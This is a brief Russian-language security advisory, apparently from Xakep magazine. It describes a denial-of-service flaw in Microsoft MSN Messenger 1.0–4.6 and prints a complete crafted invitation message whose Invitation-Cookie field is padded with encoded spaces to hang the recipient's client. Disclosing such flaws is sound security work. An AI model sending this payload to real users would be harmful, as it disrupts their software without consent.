Хакер #305. Многошаговые SQL-инъекции
Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.
Неправильный запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger.
Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6
Пример:
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8
Application-Name: Remote Assistance
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc}
Session-Protocol: SM1
Application-URL: http://www.microsoft.com
Invitation-Command: INVITE
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}